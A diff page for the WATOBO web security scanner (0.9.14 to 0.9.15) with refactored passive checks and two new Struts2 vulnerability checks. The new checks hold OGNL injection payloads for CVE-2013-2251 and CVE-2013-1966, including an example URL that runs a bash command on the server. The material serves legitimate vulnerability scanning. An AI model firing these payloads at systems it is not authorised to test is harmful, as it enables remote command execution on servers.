watobo 0.9.14 → 0.9.15
Sign up to get free protection for your applications and to get access to all the features.
- data/CHANGELOG.md +29 -0
- data/config/interceptor.yml +1 -0
- data/lib/watobo/core/active_check.rb +1 -2
- data/lib/watobo/core/client_cert_store.rb +47 -0
- data/lib/watobo/core/scanner3.rb +124 -88
- data/lib/watobo/core/session.rb +52 -47
- data/lib/watobo/core.rb +1 -11
- data/lib/watobo/gui/chatviewer_frame.rb +5 -3
- data/lib/watobo/gui/checkboxtree.rb +59 -14
- data/lib/watobo/gui/checks_policy_frame.rb +1 -5
- data/lib/watobo/gui/client_cert_dialog.rb +260 -96
- data/lib/watobo/gui/conversation_table.rb +7 -1
- data/lib/watobo/gui/conversation_table_ctrl2.rb +14 -5
- data/lib/watobo/gui/edit_comment.rb +1 -1
- data/lib/watobo/gui/main_window.rb +40 -5
- data/lib/watobo/gui/manual_request_editor.rb +10 -8
- data/lib/watobo/gui/quick_scan_dialog.rb +8 -6
- data/lib/watobo/gui/scanner_settings_dialog.rb +1 -0
- data/lib/watobo/gui/text_viewer.rb +5 -3
- data/lib/watobo/http/cookies/cookies.rb +3 -1
- data/lib/watobo/http_socket/agent.rb +1 -1
- data/lib/watobo/http_socket/client_socket.rb +409 -98
- data/lib/watobo/http_socket/connection.rb +1 -1
- data/lib/watobo/http_socket/http_socket.rb +47 -39
- data/lib/watobo/interceptor/proxy.rb +41 -212
- data/lib/watobo/mixins/httpparser.rb +17 -16
- data/lib/watobo/mixins/shapers.rb +3 -7
- data/lib/watobo.rb +2 -1
- data/modules/active/domino/domino_db.rb +5 -7
- data/modules/active/struts2/default_handler_ognl.rb +128 -0
- data/modules/active/struts2/include_params_ognl.rb +127 -0
- data/modules/passive/ajax.rb +5 -3
- data/modules/passive/detect_infrastructure.rb +2 -3
- data/modules/passive/dirindexing.rb +8 -6
- data/modules/passive/disclosure_emails.rb +13 -14
- data/modules/passive/disclosure_ipaddr.rb +13 -13
- data/modules/passive/hotspots.rb +6 -4
- data/modules/passive/in_script_parameter.rb +25 -19
- data/modules/passive/redirectionz.rb +1 -1
- data/modules/passive/sap-headers.rb +78 -0
- data/modules/passive/xss_dom.rb +5 -3
- data/plugins/catalog/catalog.rb +7 -2
- data/plugins/crawler/gui/auth_frame.rb +20 -5
- data/plugins/crawler/gui/crawler_gui.rb +56 -9
- data/plugins/crawler/lib/engine.rb +12 -14
- data/plugins/filefinder/dbs/sap.db +157 -0
- metadata +23 -2
@@ -27,13 +27,11 @@ module Watobo#:nodoc: all
|
|
27
27
|
include Watobo::Constants
|
28
28
|
def replace_post_parm(parm,value)
|
29
29
|
parm_quoted = Regexp.quote(parm)
|
30
|
-
self.last.gsub!(/([?&]{0,1})#{parm_quoted}=([
|
30
|
+
self.last.gsub!(/([?&]{0,1})#{parm_quoted}=([^&]*)(&{0,1})/i, "\\1#{parm}=#{value}\\3")
|
31
31
|
end
|
32
32
|
|
33
33
|
def replace_get_parm(parm,value)
|
34
34
|
parm_quoted = Regexp.quote(parm)
|
35
|
-
# puts "replacing parameter #{parm} with value #{value}"
|
36
|
-
# self.first.gsub!(/([?&]{0,1})#{parm}=([0-9a-zA-Z\-\._,+<>\%!=]*)(&{0,1})/i, "\\1#{parm}=#{value}\\3")
|
37
35
|
self.first.gsub!(/([?&]{1})#{parm_quoted}=([^ &]*)(&{0,1})/i, "\\1#{parm}=#{value}\\3")
|
38
36
|
end
|
39
37
|
|
@@ -42,7 +40,6 @@ module Watobo#:nodoc: all
|
|
42
40
|
end
|
43
41
|
|
44
42
|
def replaceFileExt(new_file)
|
45
|
-
# puts "replace element #{new_element}"
|
46
43
|
begin
|
47
44
|
file = new_file.strip
|
48
45
|
file.gsub!(/^\//, "")
|
@@ -53,9 +50,8 @@ module Watobo#:nodoc: all
|
|
53
50
|
end
|
54
51
|
|
55
52
|
def replaceElement(new_element)
|
56
|
-
# puts "replace element #{new_element}"
|
57
53
|
new_element.gsub!(/^\//, "")
|
58
|
-
self.first.gsub!(/(
|
54
|
+
self.first.gsub!(/([^\?]*\/)(.*) (HTTP.*)/i,"\\1#{new_element} \\3")
|
59
55
|
end
|
60
56
|
|
61
57
|
def replaceURL(new_url)
|
@@ -370,7 +366,7 @@ module Watobo#:nodoc: all
|
|
370
366
|
begin
|
371
367
|
new_header = "#{header}: #{value}\r\n"
|
372
368
|
self.each_with_index do |h, i|
|
373
|
-
if h =~ /^#{Regexp.quote(header)}:/
|
369
|
+
if h =~ /^#{Regexp.quote(header)}:/i
|
374
370
|
h.replace(new_header)
|
375
371
|
return true
|
376
372
|
end
|
data/lib/watobo.rb
CHANGED
@@ -23,6 +23,7 @@
|
|
23
23
|
#Encoding: UTF-8
|
24
24
|
require 'rubygems'
|
25
25
|
require 'yaml'
|
26
|
+
require 'json'
|
26
27
|
require 'thread'
|
27
28
|
require 'socket'
|
28
29
|
require 'timeout'
|
@@ -63,7 +64,7 @@ dont_know_why_REQUIRE_hangs = Mechanize.new
|
|
63
64
|
# @private
|
64
65
|
module Watobo#:nodoc: all #:nodoc: all
|
65
66
|
|
66
|
-
VERSION = "0.9.
|
67
|
+
VERSION = "0.9.15"
|
67
68
|
|
68
69
|
def self.base_directory
|
69
70
|
@base_directory ||= ""
|
@@ -35,7 +35,7 @@ module Watobo#:nodoc: all
|
|
35
35
|
:description => "Enumeration of well known Domino DBs.", # description of checkfunction
|
36
36
|
:author => "Andreas Schmidt", # author of check
|
37
37
|
:check_group => AC_GROUP_DOMINO,
|
38
|
-
:version => "0
|
38
|
+
:version => "1.0" # check version
|
39
39
|
)
|
40
40
|
|
41
41
|
@finding.update(
|
@@ -69,16 +69,14 @@ module Watobo#:nodoc: all
|
|
69
69
|
|
70
70
|
def generateChecks(chat)
|
71
71
|
begin
|
72
|
-
|
72
|
+
# if chat.request.url.to_s =~ /(.*)\/\w*\.nsf/ then
|
73
73
|
@domino_dbs.each do |db|
|
74
74
|
checker = proc{
|
75
75
|
test_request = nil
|
76
76
|
test_response = nil
|
77
77
|
test = chat.copyRequest
|
78
|
-
|
79
|
-
|
80
|
-
# puts line
|
81
|
-
test.unshift line
|
78
|
+
|
79
|
+
test.replaceFileExt db
|
82
80
|
|
83
81
|
test_request,test_response = doRequest(test,:default => true)
|
84
82
|
|
@@ -110,7 +108,7 @@ module Watobo#:nodoc: all
|
|
110
108
|
}
|
111
109
|
yield checker
|
112
110
|
end
|
113
|
-
end
|
111
|
+
#end
|
114
112
|
rescue => bang
|
115
113
|
puts bang
|
116
114
|
puts "ERROR!! #{Module.nesting[0].name}"
|
@@ -0,0 +1,128 @@
|
|
1
|
+
# .
|
2
|
+
# default_handler_ognl.rb
|
3
|
+
#
|
4
|
+
# Copyright 2013 by siberas, http://www.siberas.de
|
5
|
+
#
|
6
|
+
# This file is part of WATOBO (Web Application Tool Box)
|
7
|
+
# http://watobo.sourceforge.com
|
8
|
+
#
|
9
|
+
# WATOBO is free software; you can redistribute it and/or modify
|
10
|
+
# it under the terms of the GNU General Public License as published by
|
11
|
+
# the Free Software Foundation version 2 of the License.
|
12
|
+
#
|
13
|
+
# WATOBO is distributed in the hope that it will be useful,
|
14
|
+
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
15
|
+
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
16
|
+
# GNU General Public License for more details.
|
17
|
+
#
|
18
|
+
# You should have received a copy of the GNU General Public License
|
19
|
+
# along with WATOBO; if not, write to the Free Software
|
20
|
+
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
21
|
+
# .
|
22
|
+
# @private
|
23
|
+
module Watobo#:nodoc: all
|
24
|
+
module Modules
|
25
|
+
module Active
|
26
|
+
module Struts2
|
27
|
+
|
28
|
+
|
29
|
+
class Default_handler_ognl < Watobo::ActiveCheck
|
30
|
+
@@tested_directories = Hash.new
|
31
|
+
|
32
|
+
threat =<<'EOF'
|
33
|
+
A vulnerability introduced by manipulating parameters prefixed with "action:"/"redirect:"/"redirectAction:" allows remote command execution
|
34
|
+
|
35
|
+
Source: http://struts.apache.org/release/2.3.x/docs/s2-016.html
|
36
|
+
CVE: CVE-2013-2251
|
37
|
+
EOF
|
38
|
+
|
39
|
+
#
|
40
|
+
details =<<'EOD'
|
41
|
+
Example for code execution:
|
42
|
+
http://your.vulnerable.app/?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{%27/bin/bash%27,%27-c%27,%27touch%20/tmp/pwned%27})).start()}
|
43
|
+
EOD
|
44
|
+
|
45
|
+
|
46
|
+
measure = "Update Struts2 to version >2.3.15.1"
|
47
|
+
|
48
|
+
@info.update(
|
49
|
+
:check_name => 'Struts2 default handlers', # name of check which briefly describes functionality, will be used for tree and progress views
|
50
|
+
:check_group => "Struts",
|
51
|
+
:description => "Check for struts2 default handlers which doesn't sanitize parameters.", # description of checkfunction
|
52
|
+
:author => "Andreas Schmidt", # author of check
|
53
|
+
:version => "1.0" # check version
|
54
|
+
)
|
55
|
+
|
56
|
+
@finding.update(
|
57
|
+
:threat => threat, # thread of vulnerability, e.g. loss of information
|
58
|
+
:class => "Struts2 - default handlers", # vulnerability class, e.g. Stored XSS, SQL-Injection, ...
|
59
|
+
:type => FINDING_TYPE_VULN, # FINDING_TYPE_HINT, FINDING_TYPE_INFO, FINDING_TYPE_VULN
|
60
|
+
:rating => VULN_RATING_CRITICAL,
|
61
|
+
:measure => measure,
|
62
|
+
:details => details
|
63
|
+
)
|
64
|
+
|
65
|
+
def initialize(project, prefs={})
|
66
|
+
super(project, prefs)
|
67
|
+
|
68
|
+
@vuln_handlers = %w( action redirect redirectAction)
|
69
|
+
|
70
|
+
def reset
|
71
|
+
@@tested_directories.clear
|
72
|
+
end
|
73
|
+
|
74
|
+
|
75
|
+
end
|
76
|
+
|
77
|
+
|
78
|
+
def generateChecks(chat)
|
79
|
+
begin
|
80
|
+
#
|
81
|
+
path = chat.request.dir
|
82
|
+
return true if @@tested_directories.has_key?(path)
|
83
|
+
|
84
|
+
@@tested_directories[path] = true
|
85
|
+
@vuln_handlers.each do |handler|
|
86
|
+
checker = proc {
|
87
|
+
results = {}
|
88
|
+
request = nil
|
89
|
+
response = nil
|
90
|
+
test_request = chat.copyRequest
|
91
|
+
|
92
|
+
test_value = '?' + CGI::escape("#{handler}:watobo_%{10000-1}")
|
93
|
+
|
94
|
+
test_request.replaceElement test_value
|
95
|
+
|
96
|
+
request, response = doRequest(test_request)
|
97
|
+
|
98
|
+
if response.headers.select{|h| h =~ /^Location:.*(_9999)/}.length > 0
|
99
|
+
|
100
|
+
addFinding( request, response,
|
101
|
+
:check_pattern => test_value,
|
102
|
+
:proof_pattern => "Location:.*_9999",
|
103
|
+
:test_item => handler,
|
104
|
+
:chat => chat,
|
105
|
+
:title => "[#{request.dir}] - #{handler}"
|
106
|
+
)
|
107
|
+
end
|
108
|
+
|
109
|
+
[ request, response ]
|
110
|
+
}
|
111
|
+
yield checker
|
112
|
+
|
113
|
+
end
|
114
|
+
|
115
|
+
rescue => bang
|
116
|
+
puts bang
|
117
|
+
puts bang.backtrace if $DEBUG
|
118
|
+
puts "ERROR!! #{Module.nesting[0].name}"
|
119
|
+
raise
|
120
|
+
end
|
121
|
+
end
|
122
|
+
|
123
|
+
end
|
124
|
+
|
125
|
+
end
|
126
|
+
end
|
127
|
+
end
|
128
|
+
end
|
@@ -0,0 +1,127 @@
|
|
1
|
+
# .
|
2
|
+
# include_params_ognl.rb
|
3
|
+
#
|
4
|
+
# Copyright 2013 by siberas, http://www.siberas.de
|
5
|
+
#
|
6
|
+
# This file is part of WATOBO (Web Application Tool Box)
|
7
|
+
# http://watobo.sourceforge.com
|
8
|
+
#
|
9
|
+
# WATOBO is free software; you can redistribute it and/or modify
|
10
|
+
# it under the terms of the GNU General Public License as published by
|
11
|
+
# the Free Software Foundation version 2 of the License.
|
12
|
+
#
|
13
|
+
# WATOBO is distributed in the hope that it will be useful,
|
14
|
+
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
15
|
+
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
16
|
+
# GNU General Public License for more details.
|
17
|
+
#
|
18
|
+
# You should have received a copy of the GNU General Public License
|
19
|
+
# along with WATOBO; if not, write to the Free Software
|
20
|
+
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
21
|
+
# .
|
22
|
+
# @private
|
23
|
+
module Watobo#:nodoc: all
|
24
|
+
module Modules
|
25
|
+
module Active
|
26
|
+
module Struts2
|
27
|
+
|
28
|
+
|
29
|
+
class Include_params_ognl < Watobo::ActiveCheck
|
30
|
+
|
31
|
+
threat =<<'EOF'
|
32
|
+
A vulnerability, present in the includeParams attribute of the URL and Anchor Tag, allows remote command execution
|
33
|
+
|
34
|
+
Source: http://struts.apache.org/release/2.3.x/docs/s2-013.html
|
35
|
+
CVE: CVE-2013-1966
|
36
|
+
EOF
|
37
|
+
|
38
|
+
#
|
39
|
+
details =<<'EOD'
|
40
|
+
Example for code execution:
|
41
|
+
http://your.vulnerable.app/?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{%27/bin/bash%27,%27-c%27,%27touch%20/tmp/pwned%27})).start()}
|
42
|
+
EOD
|
43
|
+
|
44
|
+
|
45
|
+
measure = "Update Struts2 to version >2.3.14"
|
46
|
+
|
47
|
+
@info.update(
|
48
|
+
:check_name => 'Struts2 includeParams', # name of check which briefly describes functionality, will be used for tree and progress views
|
49
|
+
:check_group => "Struts",
|
50
|
+
:description => "Check for vulnerable includeParams attribute.", # description of checkfunction
|
51
|
+
:author => "Andreas Schmidt", # author of check
|
52
|
+
:version => "1.0" # check version
|
53
|
+
)
|
54
|
+
|
55
|
+
@finding.update(
|
56
|
+
:threat => threat, # thread of vulnerability, e.g. loss of information
|
57
|
+
:class => "Struts2 - includeParams", # vulnerability class, e.g. Stored XSS, SQL-Injection, ...
|
58
|
+
:type => FINDING_TYPE_VULN, # FINDING_TYPE_HINT, FINDING_TYPE_INFO, FINDING_TYPE_VULN
|
59
|
+
:rating => VULN_RATING_CRITICAL,
|
60
|
+
:measure => measure,
|
61
|
+
:details => details
|
62
|
+
)
|
63
|
+
|
64
|
+
def initialize(project, prefs={})
|
65
|
+
super(project, prefs)
|
66
|
+
|
67
|
+
end
|
68
|
+
|
69
|
+
|
70
|
+
def generateChecks(chat)
|
71
|
+
begin
|
72
|
+
|
73
|
+
checker = proc {
|
74
|
+
results = {}
|
75
|
+
request = nil
|
76
|
+
response = nil
|
77
|
+
test_request = chat.copyRequest
|
78
|
+
|
79
|
+
|
80
|
+
test_value = "%{(#_memberAccess['allowStaticMethodAccess']=true)(#context['xwork.MethodAccessor.denyMethodExecution']=false)(#writer=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#writer.println(INJ),#writer.close())}"
|
81
|
+
marks = [ "INJ" , Time.now.to_i.to_s ]
|
82
|
+
|
83
|
+
inj_str = marks.map{|m| "'#{m}'"}.join("+")
|
84
|
+
|
85
|
+
test_value.gsub!(/INJ/, inj_str)
|
86
|
+
|
87
|
+
tparam = Watobo::UrlParameter.new( :name => "watobo", :value => CGI::escape(test_value) )
|
88
|
+
|
89
|
+
test_request.url.set tparam
|
90
|
+
puts test_request.first
|
91
|
+
|
92
|
+
request, response = doRequest(test_request)
|
93
|
+
|
94
|
+
if response.respond_to? :body
|
95
|
+
unless response.body.nil?
|
96
|
+
body = response.body.unpack("C*").pack("C*")
|
97
|
+
#puts body
|
98
|
+
proof = marks.join
|
99
|
+
if response.body.to_s =~ /#{proof}/
|
100
|
+
addFinding( request, response,
|
101
|
+
:check_pattern => CGI::escape(test_value),
|
102
|
+
:proof_pattern => "#{proof}",
|
103
|
+
:chat => chat,
|
104
|
+
:title => "[includeParams] - #{request.file}"
|
105
|
+
)
|
106
|
+
end
|
107
|
+
end
|
108
|
+
end
|
109
|
+
|
110
|
+
[ request, response ]
|
111
|
+
}
|
112
|
+
yield checker
|
113
|
+
|
114
|
+
rescue => bang
|
115
|
+
puts bang
|
116
|
+
puts bang.backtrace if $DEBUG
|
117
|
+
puts "ERROR!! #{Module.nesting[0].name}"
|
118
|
+
raise
|
119
|
+
end
|
120
|
+
end
|
121
|
+
|
122
|
+
end
|
123
|
+
|
124
|
+
end
|
125
|
+
end
|
126
|
+
end
|
127
|
+
end
|
data/modules/passive/ajax.rb
CHANGED
@@ -51,18 +51,20 @@ module Watobo#:nodoc: all
|
|
51
51
|
end
|
52
52
|
|
53
53
|
def showError(chatid, message)
|
54
|
-
puts "!!! Error"
|
54
|
+
puts "!!! Error #{Module.nesting[0].name}"
|
55
55
|
puts "Chat: [#{chatid}]"
|
56
56
|
puts message
|
57
57
|
end
|
58
58
|
|
59
59
|
def do_test(chat)
|
60
60
|
begin
|
61
|
-
|
61
|
+
return false if chat.response.nil?
|
62
|
+
return false unless chat.response.has_body?
|
62
63
|
return true unless chat.response.content_type =~ /(text|script)/
|
63
64
|
|
64
65
|
@fw_patterns.each do |pattern|
|
65
|
-
|
66
|
+
body = chat.response.body.unpack("C*").pack("C*")
|
67
|
+
if body =~ /#{pattern[:pattern]}/i then
|
66
68
|
version = $1.strip
|
67
69
|
addFinding(
|
68
70
|
:check_pattern => "#{pattern[:pattern]}",
|
@@ -70,10 +70,9 @@ module Watobo#:nodoc: all
|
|
70
70
|
# puts "body" + chat.response.body.join
|
71
71
|
return if chat.response.nil? or chat.response.body.nil?
|
72
72
|
if chat.response.content_type =~ /text/ then
|
73
|
-
|
73
|
+
body = chat.response.body.unpack("C*").pack("C*")
|
74
74
|
@pattern_list.each do |pat|
|
75
|
-
|
76
|
-
if chat.response.join =~ /(#{pat[1]})/i then
|
75
|
+
if body =~ /(#{pat[1]})/i then
|
77
76
|
# puts "!!! MATCH !!!"
|
78
77
|
match = $1
|
79
78
|
addFinding(
|
@@ -61,12 +61,14 @@ module Watobo#:nodoc: all
|
|
61
61
|
def do_test(chat)
|
62
62
|
begin
|
63
63
|
@pattern_list.each do |pat|
|
64
|
-
|
65
|
-
|
66
|
-
|
67
|
-
|
68
|
-
|
69
|
-
|
64
|
+
next unless chat.response.has_body?
|
65
|
+
body = chat.response.body.unpack("C*").pack("C*")
|
66
|
+
if body =~ /(#{pat})/i then
|
67
|
+
match = $1
|
68
|
+
addFinding(
|
69
|
+
:proof_pattern => "#{match}",
|
70
|
+
:chat => chat,
|
71
|
+
:title => "/#{chat.request.path}"
|
70
72
|
)
|
71
73
|
end
|
72
74
|
end
|
@@ -45,29 +45,28 @@ module Watobo#:nodoc: all
|
|
45
45
|
)
|
46
46
|
|
47
47
|
valid = '[a-zA-Z\d\.+-]+'
|
48
|
-
@pattern = "#{valid}@#{valid}\\.(#{valid}){2}"
|
48
|
+
@pattern = "(#{valid}@#{valid}\\.(#{valid}){2})"
|
49
49
|
@mail_list = []
|
50
50
|
end
|
51
51
|
|
52
52
|
def do_test(chat)
|
53
53
|
begin
|
54
54
|
# puts "running module: #{Module.nesting[0].name}"
|
55
|
+
return false if chat.response.nil?
|
56
|
+
return false unless chat.response.has_body?
|
55
57
|
if chat.response.content_type =~ /text/ and not chat.response.content_type =~ /text.csv/ then
|
56
|
-
|
57
|
-
|
58
|
-
match =
|
59
|
-
|
58
|
+
body = chat.response.body.unpack("C*").pack("C*")
|
59
|
+
body.scan(/#{@pattern}/) { |m|
|
60
|
+
match = m.first
|
61
|
+
unless @mail_list.include?(match) then
|
60
62
|
@mail_list.push match
|
61
63
|
addFinding(
|
62
|
-
|
63
|
-
|
64
|
-
|
65
|
-
|
66
|
-
|
67
|
-
|
68
|
-
|
69
|
-
end
|
70
|
-
end
|
64
|
+
:proof_pattern => "#{match}",
|
65
|
+
:chat => chat,
|
66
|
+
:title => match
|
67
|
+
)
|
68
|
+
end
|
69
|
+
}
|
71
70
|
end
|
72
71
|
rescue => bang
|
73
72
|
# raise
|
@@ -45,22 +45,25 @@ module Watobo#:nodoc: all
|
|
45
45
|
)
|
46
46
|
|
47
47
|
@pattern = '[^\d\.](\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})[^(\d\.)]+?'
|
48
|
+
|
48
49
|
@known_ips = []
|
49
50
|
end
|
50
51
|
|
51
52
|
def do_test(chat)
|
52
53
|
begin
|
53
54
|
# puts "running module: #{Module.nesting[0].name}"
|
55
|
+
return false if chat.response.nil?
|
56
|
+
return false unless chat.response.has_body?
|
54
57
|
if chat.response.content_type =~ /text/ then
|
55
|
-
|
56
|
-
|
57
|
-
|
58
|
-
|
59
|
-
|
60
|
-
|
58
|
+
body = chat.response.body.unpack("C*").pack("C*")
|
59
|
+
body.scan(/#{@pattern}/) { |match|
|
60
|
+
ip_addr = match.first
|
61
|
+
octets = ip_addr.split('.')
|
62
|
+
isIP = true
|
63
|
+
octets.each do |o|
|
61
64
|
isIP = false if o.to_i > 255
|
62
|
-
|
63
|
-
|
65
|
+
end
|
66
|
+
if isIP then
|
64
67
|
title = "IP: #{ip_addr}"
|
65
68
|
dummy = chat.request.site + ":" + ip_addr
|
66
69
|
if not @known_ips.include?(dummy)
|
@@ -69,11 +72,8 @@ module Watobo#:nodoc: all
|
|
69
72
|
:title => title)
|
70
73
|
@known_ips.push dummy
|
71
74
|
end
|
72
|
-
|
73
|
-
|
74
|
-
|
75
|
-
end
|
76
|
-
end
|
75
|
+
end
|
76
|
+
}
|
77
77
|
end
|
78
78
|
rescue => bang
|
79
79
|
# raise
|
data/modules/passive/hotspots.rb
CHANGED
@@ -54,9 +54,12 @@ module Watobo#:nodoc: all
|
|
54
54
|
def do_test(chat)
|
55
55
|
begin
|
56
56
|
# puts "running module: #{Module.nesting[0].name}"
|
57
|
+
return false if chat.response.nil?
|
58
|
+
return false unless chat.response.has_body?
|
57
59
|
if chat.response.content_type =~ /(text|script)/ and chat.response.status !~ /404/ then
|
58
|
-
|
59
|
-
|
60
|
+
|
61
|
+
body = chat.response.body.unpack("C*").pack("C*")
|
62
|
+
body.split(/\n/).each do |line|
|
60
63
|
@pattern_list.each do |ext|
|
61
64
|
if line =~ /([\w%\/\\\.:-]*\.#{ext})[^\w]/ then
|
62
65
|
match = $1
|
@@ -71,8 +74,6 @@ module Watobo#:nodoc: all
|
|
71
74
|
@known_functions.push match
|
72
75
|
end
|
73
76
|
end
|
74
|
-
end
|
75
|
-
end
|
76
77
|
end
|
77
78
|
end
|
78
79
|
end
|
@@ -80,6 +81,7 @@ module Watobo#:nodoc: all
|
|
80
81
|
# raise
|
81
82
|
puts "ERROR!! #{Module.nesting[0].name}"
|
82
83
|
puts bang
|
84
|
+
puts bang.backtrace
|
83
85
|
end
|
84
86
|
end
|
85
87
|
end
|
@@ -48,42 +48,48 @@ module Watobo#:nodoc: all
|
|
48
48
|
end
|
49
49
|
|
50
50
|
def showError(chatid, message)
|
51
|
-
puts "!!! Error"
|
51
|
+
puts "!!! Error #{Module.nesting[0].name}"
|
52
52
|
puts "Chat: [#{chatid}]"
|
53
53
|
puts message
|
54
54
|
end
|
55
55
|
|
56
56
|
def do_test(chat)
|
57
57
|
begin
|
58
|
-
parm_values = []
|
59
58
|
minlen = 3
|
60
|
-
return true unless chat.response.content_type =~ /(text|script)/
|
61
|
-
chat.
|
62
|
-
|
63
|
-
|
64
|
-
|
65
|
-
chat.
|
66
|
-
pv = chat.request.post_parm_value(parm)
|
67
|
-
parm_values.push pv unless pv.strip.empty? or pv.strip.length < minlen
|
68
|
-
end
|
59
|
+
return true unless chat.response.content_type =~ /(text|script)/
|
60
|
+
return true unless chat.response.has_body?
|
61
|
+
|
62
|
+
parm_list = chat.request.parameters(:data, :url)
|
63
|
+
return true if parm_list.empty?
|
64
|
+
body = chat.response.body.unpack("C*").pack("C*")
|
69
65
|
|
70
|
-
|
71
|
-
|
72
|
-
|
73
|
-
|
66
|
+
doc = Nokogiri::HTML(body)
|
67
|
+
scripts = doc.css('script')
|
68
|
+
|
69
|
+
parm_list.each do |parm|
|
70
|
+
next if parm.value.nil?
|
71
|
+
next if parm.value.empty?
|
72
|
+
next if parm.value.length <= minlen
|
73
|
+
|
74
|
+
pattern = Regexp.quote(CGI.unescape(parm.value))
|
75
|
+
scripts.each do |script|
|
76
|
+
if script.text =~ /#{pattern}/i then
|
74
77
|
# puts "* Found: Parameter within script"
|
75
78
|
addFinding(
|
76
|
-
:check_pattern => "#{
|
77
|
-
|
78
|
-
|
79
|
-
|
79
|
+
:check_pattern => "#{parm.value}",
|
80
|
+
:proof_pattern => "#{parm.value}",
|
81
|
+
:chat=>chat,
|
82
|
+
:title =>"[#{parm.value}] - #{chat.request.path}"
|
80
83
|
)
|
84
|
+
end
|
81
85
|
|
82
86
|
end
|
83
87
|
end
|
84
88
|
rescue => bang
|
85
89
|
# raise
|
86
90
|
showError(chat.id, bang)
|
91
|
+
#puts bang.backtrace
|
92
|
+
|
87
93
|
end
|
88
94
|
end
|
89
95
|
|